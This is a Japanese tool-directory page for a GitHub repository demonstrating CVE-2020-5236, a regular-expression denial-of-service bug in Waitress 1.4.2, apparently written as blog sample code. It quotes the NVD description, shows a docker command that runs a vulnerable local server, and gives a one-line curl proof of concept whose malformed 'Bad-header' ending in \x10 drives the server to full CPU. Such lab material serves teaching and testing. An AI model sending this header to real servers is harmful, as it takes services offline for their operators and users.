Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-5236 — Waitress 1.4.2 ReDoS - CVE-2020-5236(ブログ用サンプルコード) | Kitploit
ツール/GitHubGitHub/motikan2010/cve-2020-5236
脆弱性分析ウェブセキュリティ学習と教育ラボと実践
GitHubmotikan2010/cve-2020-5236

CVE-2020-5236

Waitress 1.4.2 ReDoS - CVE-2020-5236(ブログ用サンプルコード)

リポジトリを見るウェブサイト
4216年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Waitress 1.4.2 ReDoS - CVE-2020-5236

Waitress バージョン 1.4.2 は、Waitress が不正な文字を含むヘッダーを受信したとき、DOS 攻撃を許容します。"Bad-header: xxxxxxxxxxxxxxx\x10" のようなヘッダーを受信すると、正規表現エンジンが破滅的なバックトラッキングを引き起こし、プロセスが CPU 時間を 100% 使用して他の操作をすべてブロックします。これにより、攻撃者は不正なヘッダーを含む単一のリクエストを送信し、サービスをオフラインにすることができます。

NVD による

使用方法

脆弱なサーバーを実行する

root@kitploit:~
$ docker run --rm --name waitress -v "$PWD/src:/src" -p "8080:8080" -it python:3.7-slim python /src/server.py

PoC

root@kitploit:~
$ curl "http://127.0.0.1:8080/hello/hogefuga" -H "Bad-header: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx`echo -n '\x10'`"

サーバーのCPU使用率を表示します。 docker stats waitress を実行します。

↓ PoC を実行

参照

  • NVD - CVE-2020-5236
  • 正規表現の破滅的なバックトラッキングによるサービス拒否 · アドバイザリ · Pylons/waitress
ツールをダウンロード